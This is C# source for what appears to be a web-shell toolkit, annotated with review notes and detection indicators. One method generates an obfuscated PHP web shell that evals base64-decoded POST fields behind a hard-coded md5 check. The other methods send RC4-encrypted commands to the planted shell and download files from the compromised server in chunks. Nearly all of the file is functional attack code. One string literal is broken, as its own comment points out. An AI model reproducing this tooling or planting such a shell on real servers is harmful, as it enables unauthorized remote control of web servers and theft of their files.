/// <summary>
/// Builds the source text of the server-side PHP file that the rest of this client talks to.
/// The result is three concatenated pieces: a fixed PHP prologue, an assignment to the PHP
/// variable $s holding the output of EncryptAndEncode, and a fixed PHP epilogue.
/// </summary>
/// <param name="outputPrefix">Text placed directly after the opening output marker that the embedded payload echoes.</param>
/// <param name="password">Converted to ASCII bytes and used to key the RC4 instance that processes the embedded payload.</param>
/// <returns>The complete PHP file contents as one string.</returns>
/// <remarks>
/// Static indicators for detection, all literal in this method: an eval of
/// base64_decode applied to the POST field 'enc', a comparison of md5 of that field
/// against the fixed value 3708fe651621a7337ebee38ffd26adee, a second eval gated on
/// the POST field 'k', and a PHP function named encrypt that takes two parameters
/// and uses neither.
/// </remarks>
public static string GenerateShell(string outputPrefix, string password)
{
    // RC4 is a project type declared outside this view; it is keyed with the ASCII bytes of the password.
    RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(password));

    // Payload text = echo of the opening marker plus outputPrefix, then innerShell (a member
    // defined elsewhere in the file), then echo of the closing marker. Only the
    // EncryptAndEncode'd form is written into $s, so - assuming that helper encrypts as its
    // name says - the payload text itself is not readable in the generated file.
    string encodedphp = "$s = \"" + rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes("echo \"<--" + outputPrefix + "\";" + innerShell + "echo \"-->\";"));

    // Prologue: declares the PHP function encrypt($pwd, $data). Its body ignores both
    // parameters; when the request has an 'enc' field whose md5 equals the embedded hash,
    // it base64-decodes that field, evals it and returns the result. The routine that
    // actually processes $s is therefore supplied per request and is not stored in the file.
    string beginning = "<?php\nfunction encrypt ($pwd, $data){if(isset($_POST['enc']) && md5($_POST['enc']) == \"3708fe651621a7337ebee38ffd26adee\"){return eval(base64_decode($_POST['enc']));}}\n";

    // Epilogue: closes the $s string literal, then, on any request carrying a 'k' field,
    // evals whatever encrypt($_POST['k'], base64_decode($s)) returned.
    string ending = "\";\nif(isset($_POST['k'])){;eval(encrypt($_POST['k'], base64_decode($s)));}\n?>";

    return beginning + encodedphp + ending;
}
/// <summary>
/// Records a command in the history, then either starts a file download on a new thread
/// (commands beginning with "download") or POSTs the command to url.URL and returns the
/// decoded reply.
/// </summary>
/// <param name="command">The command line as entered; split on single spaces for the download case.</param>
/// <returns>
/// A fixed status string for the download branch, the decoded response text for any other
/// command, or the exception message if the request or decoding fails.
/// </returns>
/// <remarks>
/// Wire format visible here: one HTTP POST of form fields 'k' (url.Password, sent as-is),
/// 'a' (the command after EncryptAndEncode) and 'enc' (encMethod, defined elsewhere).
/// The value in 'k' is the same value used to key RC4 for 'a' and for the reply, so a
/// capture of the request body contains what is needed to decode both, unless the
/// transport itself is encrypted.
/// </remarks>
public string ProcessCommand(string command)
{
    // History: keep the command in memory and hand it to AppendNewCommand together with the
    // hex MD5 of the target URL. What AppendNewCommand does with the pair is not visible here.
    commands.Add(command);
    AppendNewCommand(BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(ASCIIEncoding.ASCII.GetBytes(url.URL))).Replace("-", ""), command);
    // Position is set to one past the newest history entry.
    currentCommandPositon = commands.Count;

    // NOTE(review): this is a prefix match with no following space, so any command that
    // merely begins with "download" takes this branch.
    if (command.StartsWith("download"))
    {
        // Split on single spaces; an argument containing a space cannot be expressed.
        string[] args = command.Split(' ');
        // The command word plus two arguments; DownloadFile reads args[1] and args[2].
        if (args.Length >= 3)
        {
            // The transfer runs on its own thread; its outcome is reported only through
            // OnNewStatusEvent, not through this method's return value.
            Thread t = new Thread(new ParameterizedThreadStart(DownloadFile));
            t.Start(args);
            return "File download started.";
        }
        else
        {
            OnNewStatusEvent("download command failed.");
            return "download requires at least 2 arguments.";
        }
    }
    else
    {
        try
        {
            RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
            // NOTE(review): WebClient is IDisposable and is not disposed on any path.
            WebClient client = new WebClient();
            NameValueCollection nvc = new NameValueCollection();
            // 'k' carries the password unmodified, next to the data that is keyed with it.
            nvc.Add("k", url.Password);
            nvc.Add("a", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(command)));
            nvc.Add("enc", encMethod);
            // FindResponse is defined elsewhere; presumably it isolates the payload inside
            // the HTTP body - confirm against its definition.
            byte[] response = FindResponse(client.UploadValues(url.URL, "POST", nvc));
            // A new cipher instance is created for the reply instead of reusing the one
            // that processed the request.
            rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
            // Bare LF is rewritten to CRLF before the text is returned.
            string ret = UTF8Encoding.UTF8.GetString(rc4.DecodeAndDecrypt(response)).Replace("\n", "\r\n");
            // NOTE(review): the figure reported is the character count after the CRLF
            // rewrite, although the message calls it bytes.
            OnNewStatusEvent("Command returned " + ret.Length + " bytes.");
            return ret;
        }
        catch(Exception e)
        {
            // Every failure type is folded into one status line; the caller receives the
            // exception message as if it were command output.
            OnNewStatusEvent("Command failed");
            return e.Message;
        }
    }
}
/// <summary>
/// Thread entry point that fetches one remote file in a series of POST requests, writes it
/// to a local path, and compares the MD5 of the written file with a hash reported by the
/// server.
/// </summary>
/// <param name="o">
/// A string[] cast from object: element 1 is the remote file name sent to the server,
/// element 2 is the local path written to. Element 0 is not read here.
/// </param>
/// <remarks>
/// Wire format visible here: every request is a form POST to url.URL carrying 'k'
/// (url.Password, sent as-is) and 'enc' (encMethod), plus one of 'fs' (size query),
/// 'fh' (hash query), or 'd' with 'p' (data at a decimal offset). A download of N bytes
/// therefore produces two requests followed by one request per 1024-byte step, which is
/// a recognisable pattern in proxy or web-server logs.
/// </remarks>
void DownloadFile(object o)
{
    string[] args = (string[])o;
    try
    {
        // A new RC4 instance is created before every EncryptAndEncode and every
        // DecodeAndDecrypt call in this method; none is reused across calls.
        RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
        // NOTE(review): WebClient is IDisposable and is not disposed on any path.
        WebClient client = new WebClient();

        // Request 1, field 'fs': the reply is decoded and parsed as a decimal integer size.
        NameValueCollection nvc = new NameValueCollection();
        nvc.Add("k", url.Password);
        nvc.Add("fs", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
        nvc.Add("enc", encMethod);
        int filesize = 0;
        byte[] fs = FindResponse(client.UploadValues(url.URL, "POST", nvc));
        rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
        // int.Parse throws on a non-numeric reply; that is caught by the handler at the bottom.
        filesize = int.Parse(ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(fs)));

        // Request 2, field 'fh': the reply is kept as text and later compared with the
        // lower-case hex MD5 of the file written locally.
        rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
        nvc = new NameValueCollection();
        nvc.Add("k", url.Password);
        nvc.Add("fh", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
        nvc.Add("enc", encMethod);
        rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
        string filehash = ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc))));

        // An existing file at the destination is deleted and an empty one created in its place.
        if(File.Exists(args[2])) File.Delete(args[2]);
        // NOTE(review): if anything inside the loop throws, files is never closed and the
        // partially written file stays on disk.
        FileStream files = File.Create(args[2]);
        MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();

        // One request per 1024-byte step. The number of iterations is decided solely by the
        // size the server reported above.
        for(int x = 0; x < filesize; x += 1024)
        {
            rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
            nvc = new NameValueCollection();
            nvc.Add("k", url.Password);
            nvc.Add("d", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
            // 'p' is the offset for this step, sent as plain decimal text.
            nvc.Add("p", x.ToString());
            nvc.Add("enc", encMethod);
            rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
            byte[] readin = rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc)));
            // The reply length is not checked against the step size; whatever was decoded
            // is appended to the file.
            files.Write(readin, 0, readin.Length);
        }
        files.Close();

        // Re-open the finished file and hash it.
        // NOTE(review): filestream is never closed or disposed.
        Stream filestream = new FileStream(args[2], FileMode.Open, FileAccess.Read);
        byte[] result = md5.ComputeHash(filestream);
        // The expected hash came from the same server as the data, so this comparison can
        // reveal a damaged transfer but says nothing about whether the content is trustworthy.
        if(filehash != BitConverter.ToString(result).Replace("-","").ToLower())
        {
            // NOTE(review): the string literal below contains a raw line break exactly as it
            // appears in this listing. A regular C# string literal cannot span lines, so the
            // upstream file presumably has an escape sequence here - confirm before compiling.
            OnNewStatusEvent(args[1] + " file hashes do not match. 
" + filehash + " != " + BitConverter.ToString(result).Replace("-","").ToLower());
            return;
        }
        OnNewStatusEvent(args[1] + " finished downloading to " + args[2]);
    }
    catch(Exception e)
    {
        // All failures (network, parsing, file I/O) end up as one status line.
        OnNewStatusEvent("Error in downloading file: " + e.Message);
    }
}